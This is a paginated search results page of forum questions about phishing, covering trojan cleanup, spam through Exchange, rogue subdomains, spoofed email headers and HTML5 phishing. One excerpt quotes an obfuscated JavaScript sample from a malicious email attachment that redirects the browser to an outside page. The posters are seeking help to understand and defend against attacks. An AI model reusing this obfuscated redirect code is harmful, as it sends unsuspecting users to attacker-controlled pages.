Search Results

Search found 89 results on 4 pages for 'phishing'.

Page 1/4 | 1 2 3 4  | Next Page >

  • Cleaning a proxy/phishing trojan from Windows XP computer

    - by i-g
    I am trying to remove an interesting trojan from a Windows XP computer. It manifests itself as a phishing page (screenshot linked) that appears after the user tries to log on to eBay. So far, I haven't found any other web sites that are affected. As you can see, the trojan intercepts browser connections (all installed browsers are affected) and injects this phishing page. The address looks like it's ebay.com, but HTTPS verification doesn't work (no lock icon or green bar in Firefox.) At some point, Trojan.Dropper appeared on the computer. I removed it with Malwarebytes Anti-Malware. Although it reappeared several times, it seemed to be gone after I booted into Safe Mode and did a full system scan with MBAM. Now, however, a different trojan has appeared on the machine; I suspect it was installed by Trojan.Dropper. So far, MBAM, Ad-Aware, and Spybot S&D have been unable to remove it. I've looked for it in the HijackThis log but haven't found anything conclusive. Has anyone run across a trojan like this before? Where would I start looking for it to remove it manually? Thank you for reading.

    Read the article

  • Virus sending phishing emails through exchange server

    - by therulebookman
    It appears that there is a virus on my network somewhere that is sending phishing emails through my exchange server. I can see the messages in message tracking and I see many SMTP errors for NDR's and rejected connections from external servers, but I do not see any SMTP authentications and I have logging up to MAX. How can I find the IP or hostname of the PC that is infected? Or is there some other explanation than virus? Anti-virus scan on server is clean. Server is not an open relay. Thanks

    Read the article

  • Phishing site uses subdomain that I never registered

    - by gotgenes
    I recently received the following message from Google Webmaster Tools: Dear site owner or webmaster of http://gotgenes.com/, [...] Below are one or more example URLs on your site which may be part of a phishing attack: http://repair.gotgenes.com/~elmsa/.your-account.php [...] What I don't understand is that I never had a subdomain repair.gotgenes.com, but visiting it in the web browser gives an actual My DNS is FreeDNS, which does not list a repair subdomain. My domain name is registered with GoDaddy, and the nameservers are correctly set to NS1.AFRAID.ORG, NS2.AFRAID.ORG, NS3.AFRAID.ORG, and NS4.AFRAID.ORG. I have the following questions: Where is repair.gotgenes.com actually registered? How was it registered? What action can I take to have it removed from DNSs? How can I prevent this from happening in the future? This is pretty disconcerting; I feel like my domain has been hijacked. Any help would be much appreciated.

    Read the article

  • Mac OS X Update 10.6.8 weird phishing behaviour

    - by Carlos
    I just updated to Mac App Store 1.0.2 with the update to 10.6.8. The Mac App Store said I have one update available, for Angry Birds.... I do not have Angry Birds on my system, but when I clicked the update button I got the following message. "You have updates available for other accounts. Sign in to [email protected] to update applications for that account." Needless to say this account does not exist. Any ideas what this is all about?

    Read the article

  • Where should I redirect (removed) phishing pages

    - by tinjaw
    I was unfortunately the victim of a PHP exploit. Looking through my webserver logs, people are still attempting to reach the URL used in the phish. I want to redirect them to a site that will educate these people on what phishing is. My question: Is there a (generic / vendor-neutral) phishing education website that you suggest I send them to with a 301 redirect? (I assume a 301 is the best option.)

    Read the article

  • What does this suspicious phishing code do?

    - by halohunter
    A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run. <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> What did it do? It's beyond the scope of my programming knowledge.

    Read the article

  • List of free hosted domains (phishing prevention)

    - by nigative
    Does anyone has a compiled list of free hosting domains? On the website, when user clicks on external link I want them to be redirected to my page that will check if that external link is on free hosting or not. If it is, I want to warn the user, but right now I can't find a list of such domains. Any help?

    Read the article

  • Phishing : une nouvelle technique se répand avec le HTML5, elle contourne le blacklistage des URL malicieuses

    Phishing : une nouvelle technique se répand avec le HTML5 Elle contourne le blacklistage des URL malicieuses Les spammeurs et autres cyber-escrocs se mettent eux aussi au HTML5 pour contourner les mesures anti-spam et anti-phishing de plus en plus répandues et efficaces des navigateurs et les clients de messagerie. Au lieu d'intégrer aux mails des liens HTML classiques vers des pages souvent blacklistées, les spammeurs "modernes" privilégieraient désormais les « attachements HTML ». M86, la firme de sécurité met en tout cas en garde contre la recrudescence de ces menaces. Les liens dans les mail pointent désormais vers des pages HTML jointe, qui contiennen...

    Read the article

  • how do I get rid of the secure nonsecure warning on page with iframe under SSL with phishing filter?

    - by Manu
    I have a page under SSL with an iframe that refreshes itself every 20 seconds through an HTTP refresh prgama. If I browse the site with IE7 and phishing filter enabled I receive secure-nonsecure content warnings in irregular intervals which cease if phishing filter is disabled. Does anybody have an idea what I can do in order to get rid of the warnings even if phishing filter is enabled?

    Read the article

  • Phishing alert but file never existed

    - by IMB
    I got an alert from Google Webmasters. They say the following file was present in my host: example.com/~jhostgop/identity.php I checked my files and it never existed at all. I've experience this problem in two different host and domains but the file never existed in my file system. It appears somebody out there is linking a random domain and it prefixes the link with /~jhostgop/identity.php. Now Google may have indexed them so now I get those false phishing alerts. Anyone experienced this? Is it possible to prevent this?

    Read the article

  • Phishing attack stuck with jsp loginAction.do page?

    - by user970533
    I'm testing a phishing website on a staged replica of an jsp web-application. I'm doing the usual attack which involves changing the post and action field of source code to divert to my own written jsp script capture the logins and redirect the victim to the original website. It looks easy, but trust me, it's has been me more then 2 weeks and I cannot write the logins to the text file. I have tested the jsp page on my local wamp server it works fine. In staged, when I click on the ok button for user/password field I'm taken to loginAction.do script. I checked this using the tamper data add-on on Firefox. The only way I was able to make my script run was to use burp proxy intercept the request and change action parameter to refer my uploaded script. I want to know what does an loginAction.do? I have googled it - it's quite common to see it in jsp application. I have checked the code; there is nothing that tells me why the page always points to the .do script instead of mine. Is there some kind of redirection in Tomcat? I like to know. I'm unable to exploit this attack vector? I need the community's help.

    Read the article

  • le tabnagging: une nouvelle méthode d'attaque par phishing qui se base sur l'utilisation des tabs de

    Mis à jour 29 May 2010: Comme nous pouvions nous y attendre l'équipe travaillant sur le célèbre plugin NoScript vient de mettre à jour à la version 1.9.9.81. La première info de cette mise à jour est la suivante: Citation: Experimental protection against Aviv Raff's scriptless tabnagging variant, by blocking refreshes triggered on unfocused untrusted tabs. See the changelog for more details.

    Read the article

  • My URL has been identified as a phishing site

    - by user2118559
    Some months before ordered VPS at Ramnode According to tutorial (ZPanelCP on CentOS 6.4) http://www.zvps.co.uk/zpanelcp/centos-6 Installed CentOS and ZPanel) Today received email We are requesting that you secure and investigate the phishing website identified below. This URL has been identified as a phishing site and is currently involved in identity theft activities. URL: hxxp://111.11.111.111/www.connet-itunes.fr/iTunesConnect.woasp/ //IP is modified (not real) This site is being used to display false or spoofed content in an apparent effort to steal personal and financial information. This matter is URGENT. We believe that individuals are being falsely directed to this page and may be persuaded into divulging personal information to a criminal, if the content is not immediately disabled. Trying to understand. Some hacker hacked VPS, placed some file (?) with content that redirects to www.connet-itunes.fr/iTunesConnect.woasp? Then questions 1) how can I find the file? Where it may be located? url is URL: hxxp://111.11.111.111/ IP address, not domain name 2) What to do to protect VPS (with CentOS)? Any tutorial? Where may be security problem? I mean may be someone faced something similar....

    Read the article

  • Mail sent from local Postfix marked as "possible phishing" in Outlook

    - by leo grrr
    Hi folks, Sorry for the newbie question--this is not my area of expertise by a long shot. I work at a small development shop and we finally got around to doing code reviews. (Yay!) I set up an instance of Review Board -- an open-source code review tool -- on one of our local servers but it doesn't seem to like talking to our hosted Exchange server to send notification emails. I decided to just install Postfix on that same box and send mail from localhost, which is working much more reliably, but Outlook disables all links in the email announcements and marks it as possible phishing. What is making these emails look suspicious and what can I change? Would the best thing be to figure out how to relay to Exchange from Postfix? Thanks!

    Read the article

  • Les pirates peuvent cacher une page entière dans un lien, une méthode de phishing via URI fonctionnant sur Firefox et Opera détaillée

    Les pirates peuvent cacher une page entière dans un lien une méthode de phishing via URI fonctionnant sur Firefox et Opera détaillée L'hameçonnage, une technique utilisée par des pirates pour obtenir les informations personnelles des internautes pour usurper leur identité pourrait se faire sans avoir recours à un site de phishing. Selon un rapport de recherche d'Henning Klevjer, un étudiant en sécurité informatique de l'université d'Oslo en Norvège, les pirates peuvent effectuer des attaques par phishing en intégrant le code complet d'une page Web dans un URI. Un URI (Uniform Resource Identifier) est une chaine de caractères identifiant une ressource sur un réseau. Une de ses impl...

    Read the article

  • Internet Explorer : Microsoft rejoint la Phishing Initiative, un projet commun avec Paypal et le CERT-LEXSI contre l'hameçonnage

    Internet Explorer : Microsoft rejoint la Phishing Initiative Un projet commun avec Paypal, et le CERT-LEXSI contre l'hameçonnage En partenariat avec le CERT-LEXSI, Microsoft participe à la « phishing initiative » afin de fournir aux utilisateurs français d'Internet Explorer une meilleure protection contre le hameçonnage. Après l'annonce de l'introduction d'une fonctionnalité contre le traçage sur le web dans IE9 Microsoft ne s'arrête pas là malgré les études présentant

    Read the article

  • How are spam e-mails filtered ?

    - by kevindqc
    Hello. I'm just wondering how some e-mails get past the spam filter, and some don't? Everyday I get World of Warcraft phishing emails that get past the filter... For example, here's a phishing email (just the header) I got in my inbox, and not in my junk mail: X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtTQ0w9Ng== X-Message-Status: n:0 X-SID-PRA: [email protected] X-AUTH-Result: NONE X-Message-Info: M98loaK0Lo27IVRxloyPIZmAwUHKn18nx0o/idLdvGYjK48i19NuvFOnRFYGWE+HdIrNJpi1XaYx0gaAV13cgRnkWSzgHKG1 Received: from blizzard.com ([204.45.59.37]) by SNT0-MC3-F21.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Sat, 10 Apr 2010 06:38:24 -0700 Received: from hxeabjlh ([192.168.1.165]) (envelope-sender <[email protected]>) by 192.168.1.111 with ESMTP for <[email protected]>; Sat, 10 Apr 2010 08:43:24 -0500 Reply-To: <[email protected]> Sender: [email protected] Message-ID: <DE567AFB9E2F3DD985A2D9A8D12D2917@hxeabjlh> From: "[email protected]" <[email protected]> To: <[email protected]> Subject: World of Warcraft Account Password verification Date: Sat, 10 Apr 2010 21:38:10 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_04EE_0137659E.1AA23350" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.5512 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512 Return-Path: [email protected] X-OriginalArrivalTime: 10 Apr 2010 13:38:24.0607 (UTC) FILETIME=[17F3A6F0:01CAD8B3] From what I understand, when you send an email with SMTP, you can specify any hostname in the "HELO" command. Here, the spammer specified "blizzard.com". And he sent his email through Hotmail using Outlook Express. I just don't understand how this gets past the spam filter? There's this SPF thing that seems to exist... but it doesn't seem to be used by blizzard? I'm on Windows, and if I use nslookup to look for the TXT records of blizzard.com and worldofwarcraft.com, I don't see a thing.... so blizzard is not using SPF? Why would that be?

    Read the article

1 2 3 4  | Next Page >